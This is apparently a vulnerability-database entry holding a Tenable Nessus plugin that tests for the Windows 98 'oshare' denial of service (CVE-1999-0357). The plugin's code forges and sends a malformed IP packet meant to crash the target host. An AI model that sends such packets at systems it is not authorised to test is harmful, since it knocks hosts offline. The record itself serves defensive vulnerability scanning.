{"id": "OSHARE.NASL", "type": "nessus", "bulletinFamily": "scanner", "title": "Microsoft Windows 98 Malformed oshare Packet DoS", "description": "It was possible to crash the remote system using the 'oshare' attack.\n\nAn attacker may use this problem to prevent your site from working properly.", "published": "1999-07-29T00:00:00", "modified": "2019-03-06T00:00:00", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}, "cvss2": {}, "cvss3": {"score": null, "vector": null}, "href": "https://www.tenable.com/plugins/nessus/10170", "reporter": "This script is Copyright (C) 1999-2019 Tenable Network Security, Inc.", "references": ["http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0357"], "cvelist": ["CVE-1999-0357"], "immutableFields": [], "lastseen": "2021-10-19T03:26:02", "viewCount": 17, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-1999-0357"]}], "rev": 4}, "score": {"value": 6.2, "vector": "NONE"}, "backreferences": {"references": [{"type": "cve", "idList": ["CVE-1999-0357"]}]}, "exploitation": null, "vulnersScore": 6.2}, "pluginID": "10170", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n# This attack is very unlikely to work from a large number\n# of systems which check ip->ip_len before sending the packets.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(10170);\n script_version(\"1.26\");\n script_cvs_date(\"Date: 2019/03/06 18:38:55\");\n\n script_cve_id(\"CVE-1999-0357\");\n\n script_name(english:\"Microsoft Windows 98 Malformed oshare Packet DoS\");\n script_summary(english:\"Crashes the remote host using the 'oshare' attack\");\n\n script_set_attribute(attribute:\"synopsis\", value:\"The remote host is vulnerable to a denial of service.\");\n script_set_attribute(attribute:\"description\", value:\n\"It was possible to crash the remote system using the 'oshare' attack.\n\nAn attacker may use this problem to prevent your site from working\nproperly.\");\n script_set_attribute(attribute:\"solution\", value:\"Contact your vendor for a patch.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"1999/01/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"1999/07/29\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_end_attributes();\n\n script_category(ACT_KILL_HOST);\n script_copyright(english:\"This script is Copyright (C) 1999-2019 Tenable Network Security, Inc.\");\n script_family(english:\"Windows\");\n\n script_require_keys(\"Settings/ParanoidReport\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\nif ( TARGET_IS_IPV6 ) exit(0);\nip = forge_ip_packet(ip_v : 4, ip_len : 44, ip_hl : 11,\n\t\t ip_tos : 0, ip_id : rand(), ip_off : 16383,\n\t\t ip_ttl : 0xFF, ip_p : IPPROTO_UDP,\n\t\t ip_src : compat::this_host());\n\nstart_denial();\nsend_packet(ip, pcap_active:FALSE);\n\nalive = end_denial();\nif(!alive){\n\t\tsecurity_hole(0);\n\t\tset_kb_item(name:\"Host/dead\", value:TRUE);\n\t }\n\n", "naslFamily": "Windows", "cpe": [], "solution": "Contact your vendor for a patch.", "nessusSeverity": "High", "cvssScoreSource": "", "vpr": {"risk factor": "Low", "score": "3.6"}, "exploitAvailable": false, "exploitEase": "", "patchPublicationDate": null, "vulnerabilityPublicationDate": "1999-01-25T00:00:00", "exploitableWith": [], "_state": {"dependencies": 1646626886}}